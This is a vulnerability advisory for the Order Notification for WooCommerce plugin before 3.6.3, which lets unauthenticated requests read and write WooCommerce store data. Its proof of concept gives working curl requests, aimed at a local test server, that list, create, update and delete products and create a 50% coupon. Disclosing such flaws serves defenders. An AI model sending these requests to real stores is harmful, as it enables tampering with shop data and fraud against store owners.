Order Notification for WooCommerce < 3.6.3 – Unauthenticated WooCommerce REST Permission Bypass | CVE 2025-15484

Description

The plugin overrides WooCommerce's permission checks to grant full access to all unauthenticated requests, enabling complete read/write access to store resources like products, coupons, and customers.

Proof of Concept

1) List products (read without authentication)
curl -i "http://localhost:10005/wp-json/wc/v3/products?per_page=1"

2) Create a product (write without authentication)
curl -i -X POST "http://localhost:10005/wp-json/wc/v3/products"   -H "Content-Type: application/json"   --data '{"name":"Injected Product","type":"simple","regular_price":"9.99"}'

3) Update the created product (replace <ID>)
curl -i -X PUT "http://localhost:10005/wp-json/wc/v3/products/<ID>"   -H "Content-Type: application/json"   --data '{"regular_price":"19.99","name":"Injected Product v2"}'

4) Delete the created product (replace <ID>)
curl -i -X DELETE "http://localhost:10005/wp-json/wc/v3/products/<ID>?force=true"

5) Create a coupon without authentication
curl -i -X POST "http://localhost:10005/wp-json/wc/v3/coupons"   -H "Content-Type: application/json"   --data '{"code":"NXEXPLOIT50","discount_type":"percent","amount":"50"}'